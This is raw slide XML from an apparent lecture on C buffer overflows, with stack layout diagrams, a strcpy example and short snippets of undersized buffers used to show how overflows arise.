            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some defenses controlled by programmer, some by compiler, some by OS &amp; hardware</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Refresher on Memory Layout:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>non-const strings typically on stack</a:t>
            </a:r>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF797714-2079-F342-BAEF-5A25579E3B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="455730"/>
            <a:ext cx="3646024" cy="5914133"/>
            <a:chOff x="6588078" y="451413"/>
            <a:chExt cx="3646024" cy="5914133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ADE7B75-2ACC-E446-98E0-CC155B00DDE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="451413"/>
              <a:ext cx="1469984" cy="7986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2FDA9CBE-0304-674D-A4BF-47844C23A952}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="1250067"/>
              <a:ext cx="1469984" cy="5671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t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Rectangle 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B51FFDEB-142D-4048-AB62-03F91861278D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="1817226"/>
              <a:ext cx="1469984" cy="1597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9CDB88D6-8825-624C-9CC6-243A712B8E96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="3414531"/>
              <a:ext cx="1469984" cy="567160"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="wdUpDiag">
              <a:fgClr>
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="accent6">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:bgClr>
            </a:patt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Return Address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rectangle 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F9C852-A40C-3F4A-A73F-4436081AA8B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8764118" y="3981691"/>
              <a:ext cx="1469984" cy="219918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TextBox 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20526AB4-325F-D947-8B47-B893D418BA9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6588078" y="5996214"/>
              <a:ext cx="1408527" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>Stack Pointer</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Arrow Connector 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E45171E-3542-2243-9013-94D493C218BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="28" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7996605" y="6180880"/>
              <a:ext cx="767513" cy="0"/>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30" name="Rounded Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99034B6A-A3B1-8D40-85FA-6EDFB5AF8818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357910" y="3429000"/>
            <a:ext cx="4313819" cy="1508324"/>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buffer_too_small</a:t>
            </a:r>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    puts("Enter a string:");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    char buffer[8]; // too small</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Group 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E15DD4C-7268-754C-9FCC-9C681BD03007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959448" y="5147021"/>
            <a:ext cx="1469984" cy="467508"/>
            <a:chOff x="9124092" y="5147021"/>
            <a:chExt cx="1305340" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2B5AD63-9698-8345-8EF5-F06B4C410ED5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9124092"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5CEF56-D859-A046-BDC2-3F764DD67571}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="928642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8B5D9-F529-BD4F-9FE7-DC4C0792531C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="944874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FA7514C-5D6A-6A48-8066-66D24089C1B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9611075"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353EF3D-3276-644B-B512-FF171672A530}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9778400"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C1D1025-0578-C248-AB42-72F3C6CAE7B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9940957"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EA8134-1708-E64C-8062-980005B17BCA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10105601"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F2304F0-BD9F-B04F-9658-1645F8AD034F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10264788" y="5147021"/>
              <a:ext cx="164644" cy="4675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D2D5A87B-59B8-F64C-8F7A-265A48F0E0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787588" y="5196091"/>
            <a:ext cx="1408527" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Straight Arrow Connector 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5650260-FC83-FC46-9F2D-1B876EA3DB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="39" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8196115" y="5380757"/>
            <a:ext cx="763333" cy="3"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>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5D5C8548-B61B-9242-A9CC-92BEC86388C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1401201" y="3986008"/>
            <a:ext cx="6090651" cy="1210083"/>
            <a:chOff x="6147900" y="3783723"/>
            <a:chExt cx="6090651" cy="1210083"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Oval 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0567E3E-81E7-AA4F-8964-D8133232A3BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6147900" y="3783723"/>
              <a:ext cx="2743200" cy="4545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5B43A985-102E-5D42-9252-90BBE6E46639}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="44" idx="6"/>
              <a:endCxn id="39" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8891100" y="4011022"/>
              <a:ext cx="3347451" cy="982784"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:pr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10975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0BA685-E4B7-FD4F-BBC6-2E73C247794D}"/>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50</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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F11E69-3A0A-7046-9271-0E9F91ACF1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9339" y="2398643"/>
            <a:ext cx="10413322" cy="3205302"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{311B1E2E-CBAB-DB4B-88AB-5232C0772C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8987027" y="5624513"/>
            <a:ext cx="2315634" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://xkcd.com/327/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377248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BCEC44-FC52-FF42-830D-001EDFA6FF1E}"/>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4C4A10F6-AEB6-5445-8B38-6F4B34C9B3D0}"/>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6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F8478B1-4538-8C43-84C3-DF07D6BF8A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B26C84A-86F8-064E-A6F5-4054C3FB8A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886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i="1" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a Buffer Overflow?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> discussion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other string functions rely on terminal ‘\0’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C strings are arrays of chars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C doesn’t bounds-check arrays</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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slide by Bohn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2398419"/>
            <a:ext cx="4267201" cy="2824437"/>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 copy t to s*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(char *s, char *t) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    char c;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    long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0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    do {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        c = t[</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s[</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 = c;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>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    } while (c != '\0');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5470175" y="5222856"/>
            <a:ext cx="6585649" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1603375" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>1 + 2 + 3 =	opportunity to create string</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>	longer than space allocated for it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56282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Sometimes Buffer Overflows are Accidental</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 23"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May go undetected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May cause unexpected behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May crash the program</a:t>
            </a:r>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 24"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slide by Bohn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1309964" y="1989537"/>
            <a:ext cx="4471354" cy="1610311"/>
          </a:xfrm>
          <a:prstGeom prst="round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FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "Hello";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
